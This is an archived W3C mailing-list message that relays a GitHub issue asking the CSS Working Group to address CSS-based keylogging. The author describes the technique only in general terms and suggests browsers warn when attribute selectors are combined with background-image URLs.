[csswg-drafts] [selectors-4] [backgrounds-3] Prevent CSS keylogging from André Jaenisch via GitHub on 2018-03-08 (public-css-archive@w3.org from March 2018)

From: André Jaenisch via GitHub <sysbot+gh@w3.org>
Date: Thu, 08 Mar 2018 23:05:48 +0000
To: public-css-archive@w3.org
Message-ID: <issues.opened-303665356-1520550347-sysbot+gh@w3.org>

Ryuno-Ki has just created a new issue for https://github.com/w3c/csswg-drafts:

== [selectors-4] [backgrounds-3] Prevent CSS keylogging ==
Originally I've opened [Bug 1440786](https://bugzilla.mozilla.org/show_bug.cgi?id=1440786) regarding this.

You may have heard about https://github.com/maxchehab/CSS-Keylogging that is, abusing CSS for keylogging by a mix of [attribute substrings](https://drafts.csswg.org/selectors-4/#attribute-substrings) in selectors and [background-image](https://drafts.csswg.org/css-backgrounds-3/#typedef-image).

My intention was to get ideas on how we as web authors can deal with it.
I am a web developer and user and want my visitors, friends and family to protect against this.
My idea was that, because the browser can't tell from the URL of the background-image to its purpose, to flag this combination as suspicious (i.e. console.warn). This way, we can raise the awareness of it. An even better way would be to gather data to make an informed decision.

@dveditz of Mozilla's security team [considered a fix a violation to the spec](https://bugzilla.mozilla.org/show_bug.cgi?id=1440786#c3), so I am turning to the spec authors next :-)

Please keep in mind that this is my first interaction with a W3C working group directly (aside of following the MathML mailing list as reader for a while). I am open to suggestions on how to better fill issues.

Many thanks to @dveditz and @dbaron for their support on Mozilla's bug tracker.

Please view or discuss this issue at https://github.com/w3c/csswg-drafts/issues/2426 using your GitHub account

Received on Thursday, 8 March 2018 23:05:52 UTC